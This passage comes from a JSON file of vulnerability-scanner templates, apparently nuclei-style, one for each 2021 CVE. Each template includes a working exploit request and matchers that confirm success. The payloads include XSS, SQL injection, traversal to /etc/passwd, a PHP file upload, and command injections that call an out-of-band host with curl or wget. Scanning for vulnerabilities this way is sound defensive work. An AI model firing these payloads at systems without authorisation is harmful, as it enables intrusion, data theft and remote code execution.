Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D","{{BaseURL}}/forum/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D%22"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=alert(document.domain) x=","FUDforum"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46704","info":{"name":"GenieACS => 1.2.8 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/ping/;`id`"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["uid=([0-9]+)"]},{"type":"status","status":[500]}],"extractors":[{"type":"regex","regex":["uid=(\\d+)\\((\\w+)\\)"],"part":"body"}]}]},{"id":"CVE-2021-21801","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24214","info":{"name":"WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/daggerhart-openid-connect-generic/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["OpenID Connect Generic Client"]}]},{"method":"GET","path":["{{BaseURL}}/wp-login.php?login-error=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ERROR (<script>alert(document.domain)</script>):","Login with OpenID Connect"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39144","info":{"name":"XStream 1.4.18  - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n    </default>\n    <int>3</int>\n    <dynamic-proxy>\n      <interface>java.lang.Comparable</interface>\n      <handler class='sun.tracing.NullProvider'>\n        <active>true</active>\n        <providerType>java.lang.Comparable</providerType>\n        <probes>\n          <entry>\n            <method>\n              <class>java.lang.Comparable</class>\n              <name>compareTo</name>\n              <parameter-types>\n                <class>java.lang.Object</class>\n              </parameter-types>\n            </method>\n            <sun.tracing.dtrace.DTraceProbe>\n              <proxy class='java.lang.Runtime'/>\n              <implementing__method>\n                <class>java.lang.Runtime</class>\n                <name>exec</name>\n                <parameter-types>\n                  <class>java.lang.String</class>\n                </parameter-types>\n              </implementing__method>\n            </sun.tracing.dtrace.DTraceProbe>\n          </entry>\n        </probes>\n      </handler>\n    </dynamic-proxy>\n    <string>curl http://{{interactsh-url}}</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-42565","info":{"name":"myfactory FMS  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20038","info":{"name":"SonicWall SMA100 Stack - Buffer Overflow/Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};?{{repeat(\"A\", 518)}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"prefix_addr":["%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf"],"system_addr":["%08%b7%06%08","%64%b8%06%08"]},"attack":"clusterbomb","matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-28854","info":{"name":"VICIdial Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/agc/vicidial_mysqli_errors.txt"],"matchers-condition":"and","matchers":[{"type":"word","words":["text/plain"],"part":"header"},{"type":"status","status":[200]},{"type":"word","words":["vdc_db_query"],"part":"body"}]}]},{"id":"CVE-2021-27909","info":{"name":"Mautic <3.3.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/passwordreset?bundle=';alert(document.domain);var+ok='"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'';alert(document.domain);var ok='","mauticBasePath"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24436","info":{"name":"WordPress W3 Total Cache <2.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=w3tc_extensions&extension=\"%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, '><script>alert(document.domain)</script>&action=view')","contains(header_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2021-46069","info":{"name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_mechanic HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&email=asd1@asd.com&status=1\n","GET /admin/?page=mechanics HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-27320","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&lastname={{randstr}}&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-43831","info":{"name":"Gradio < 2.5.0 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/file/../../../../../../../../../../../../../../../../../..{{path}}"],"payloads":{"path":["/etc/passwd","/windows/win.ini"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24145","info":{"name":"WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: multipart/form-data; boundary=---------------------------132370916641787807752589698875\n\n-----------------------------132370916641787807752589698875\nContent-Disposition: form-data; name=\"feed\"; filename=\"{{randstr}}.php\"\nContent-Type: text/csv\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n-----------------------------132370916641787807752589698875\nContent-Disposition: form-data; name=\"mec-ix-action\"\n\nimport-start-bookings\n-----------------------------132370916641787807752589698875--\n","GET /wp-content/uploads/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2021-1499","info":{"name":"Cisco HyperFlex HX Data Platform - Arbitrary File Upload","severity":"medium"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583\nOrigin: {{RootURL}}\nReferer: {{RootURL}}\n\n-----------------------------253855577425106594691130420583\nContent-Disposition: form-data; name=\"file\"; filename=\"../../../../../tmp/passwd9\"\nContent-Type: application/json\n\nMyPasswdNewData->/api/tomcat\n\n-----------------------------253855577425106594691130420583--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{\"result\":","\"filename:","/tmp/passwd9"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25078","info":{"name":"Affiliates Manager < 2.9.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /?wpam_id=1 HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-For: <img src onerror=alert(document.domain)>\n","GET /wp-admin/admin.php?page=wpam-clicktracking HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200 && status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"<img src onerror=alert(document.domain)>\")","contains(body_3, \"Affiliates Manager Click Tracking\")"],"condition":"and"}]}]},{"id":"CVE-2021-24288","info":{"name":"WordPress AcyMailing <7.5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-26247","info":{"name":"Cacti - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42013","info":{"name":"Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\necho Content-Type: text/plain; echo; {{cmd}}\n\n"],"stop-at-first-match":true,"unsafe":true,"matchers-condition":"or","matchers":[{"type":"word","name":"RCE","words":["CVE-2021-42013"]},{"type":"regex","name":"LFI","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-25085","info":{"name":"WOOF WordPress plugin - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"additional_fields\":[\"<img src=x onerror=alert(document.domain)>\"]}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27132","info":{"name":"Sercomm VD625 Smart Modems - CRLF Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Disposition: attachment;filename=test.txt","Set-Cookie:CRLFInjection=Test","Location: interact.sh","X-XSS-Protection:0"],"condition":"and"},{"type":"status","part":"header","status":[404]}]}]},{"id":"CVE-2021-31537","info":{"name":"SIS Informatik REWE GO SP17 <7.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>confirm({{randstr}})</script>","SIS-REWE"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2021-43798","info":{"name":"Grafana v8.x - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd","{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini","{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","regex":["root:.*:0:([0-9]+):","\\/tmp\\/grafana\\.sock","\\[(fonts|extensions|Mail|files)\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24389","info":{"name":"WordPress FoodBakery <2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41174","info":{"name":"Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","words":["Grafana","frontend_boot_js_done_time_seconds"],"condition":"and"},{"type":"regex","regex":["\"subTitle\":\"Grafana (v8\\.(?:(?:1|0)\\.[0-9]|2\\.[0-2]))"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"subTitle\":\"Grafana ([a-z0-9.]+)"]}]}]},{"id":"CVE-2021-25899","info":{"name":"Void Aural Rec Monitor 9.0.0.1 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /AurallRECMonitor/services/svc-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nparam1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))dummy)--+dummy&param2=test\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Contacte con el administrador\")"],"condition":"and"}]}]},{"id":"CVE-2021-33544","info":{"name":"Geutebruck - Remote Command Injection","severity":"high"},"requests":[{"raw":["GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-41460","info":{"name":"ECShop 4.1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /delete_cart_goods.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=1||(updatexml(1,concat(0x7e,(select%20md5({{num}}))),1))\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29200","info":{"name":"Apache OFBiz < 17.12.07 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ser>\n        <map-HashMap>\n          <map-Entry>\n            <map-Key>\n              <cus-obj>{{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"hex\")}}</cus-obj>\n            </map-Key>\n            <map-Value>\n              <std-String value=\"STDSTRING\"/>\n            </map-Value>\n          </map-Entry>\n        </map-HashMap>\n     </ser>\n  </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["value=\"responseMessage\""]}]}]},{"id":"CVE-2021-41691","info":{"name":"openSIS Student Information System 8.0 SQL Injection","severity":"high"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nUSERNAME={{username}}&PASSWORD={{password}}&language=en&log=\n","POST /TransferredOutModal.php?modfunc=detail HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nstudent_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5\n"],"attack":"pitchfork","payloads":{"username":["student"],"password":["student@123"]},"matchers":[{"type":"dsl","dsl":["contains(body_2, \"<!-- SQL STATEMENT:\") && contains(body_2, \"SELECT COUNT(STUDENT_ID)\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-26710","info":{"name":"Redwood Report2Web 4.3.4.5 & 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41648","info":{"name":"PuneethReddyHC action.php SQL Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/action.php"],"body":"proId=1'&addToCart=1","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Warning: mysqli_num_rows() expects parameter 1 to be","xdebug-error xe-warning"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24278","info":{"name":"WordPress Contact Form 7 <2.3.4 - Arbitrary Nonce Generation","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php"],"body":"action=wpcf7r_get_nonce&param=wp_rest","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\"success\":true","\"nonce\":\"[a-f0-9]+\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["\"nonce\":\"[a-f0-9]+\""],"part":"body"}]}]},{"id":"CVE-2021-40149","info":{"name":"Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/self.key"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?m)^-----BEGIN PRIVATE KEY-----"]},{"type":"word","part":"header","words":["application/json","application/html"],"condition":"and","negative":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43734","info":{"name":"kkFileview v4.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd","{{BaseURL}}/getCorsFile?urlPath=file:///c://windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21881","info":{"name":"Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic dXNlcjp1c2Vy\nContent-Type: application/x-www-form-urlencoded\n\najax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #\n","POST / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46UEFTUw==\nContent-Type: application/x-www-form-urlencoded\n\najax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-31602","info":{"name":"Hitachi Vantara Pentaho/Business Intelligence Server - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pentaho/api/userrolelist/systemRoles?require-cfg.js","{{BaseURL}}/api/userrolelist/systemRoles?require-cfg.js"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<roleList>","<roles>Anonymous</roles>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32305","info":{"name":"Websvn <2.6.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-40438","info":{"name":"Apache <= 2.4.48 Mod_Proxy - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?unix:{{repeat(\"A\", 7701)}}|http://{{interactsh-url}}/"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains_all(header, \"X-Interactsh-Version\", \"Server: oast\")","!contains(body, '<h1> Interactsh Server </h1>')"],"condition":"and"}]}]},{"id":"CVE-2021-24838","info":{"name":"WordPress AnyComment <0.3.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh","{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh?a=https://interact.sh"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-24947","info":{"name":"WordPress Responsive Vector Maps < 6.4.2 - Arbitrary File Read","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29441","info":{"name":"Nacos <1.4.1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nUser-Agent: Nacos-Server\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 403","status_code_2 == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body_1, 'Forbidden')","body_2 == 'true'"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2021-24498","info":{"name":"WordPress Calendar Event Multi View <1.4.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(1)><","Calendar Details"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24970","info":{"name":"WordPress All-In-One Video Gallery <2.5.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=all-in-one-video-gallery&tab=..%2F..%2F..%2F..%2F..%2Findex  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"All-in-One Video Gallery\")","contains(body_2, \"Hello world!\")","contains(body_2, \"Welcome to WordPress\")"],"condition":"and"}]}]},{"id":"CVE-2021-33851","info":{"name":"WordPress Customize Login Image <3.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=<script>alert(document.domain)</script>&cli_logo_file=&cli_login_background_color=&cli_custom_css=\n","GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(header_4, \"text/html\")","contains(body_4, \"Go to <script>alert(document.domain)</script>\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-25079","info":{"name":"Contact Form Entries < 1.2.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: 